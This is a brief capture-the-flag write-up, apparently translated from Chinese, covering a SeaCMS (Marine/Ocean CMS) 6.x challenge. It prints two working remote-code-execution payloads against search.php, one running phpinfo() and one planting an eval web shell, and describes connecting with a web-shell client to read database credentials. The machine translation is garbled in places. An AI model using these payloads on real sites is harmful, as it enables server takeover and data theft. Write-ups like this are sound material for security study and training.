Open discovery is Marine CMS, then search for related vulnerabilities
Found an article describing the command execution vulnerability of Marine CMS: Https://www.jianshu.com/p/ebf156afda49
Direct use of the POC given therein
/search.php
Searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter} &letter=al{searchpage:lang}&yuyan= (join{searchpage:jq}&jq= ($_p{searchpage:ver}&&ver=ost[9) )) &9[]=ph&9[]=pinfo ();
System commands can be executed
Did not find the flag, consider possible in the database, want to upload a sentence, and then use a chopper to check the database again, but no permission to write files, manually check the database feel too troublesome, so change exp
Marine cms v6.28 Command Execution vulnerability: https://www.uedbox.com/seacms-v628-0day/
/search.php?searchtype=5&tid=&area=eval ($_post[cmd])
Kitchen Knife Direct connection
Looking for a long time finally found the database configuration file
Edit the shell configuration as follows
Finally get flag
I spring and autumn--"Baidu Cup" CTF competition September field--test (Ocean cms/seacms Arbitrary Code Execution Vulnerability)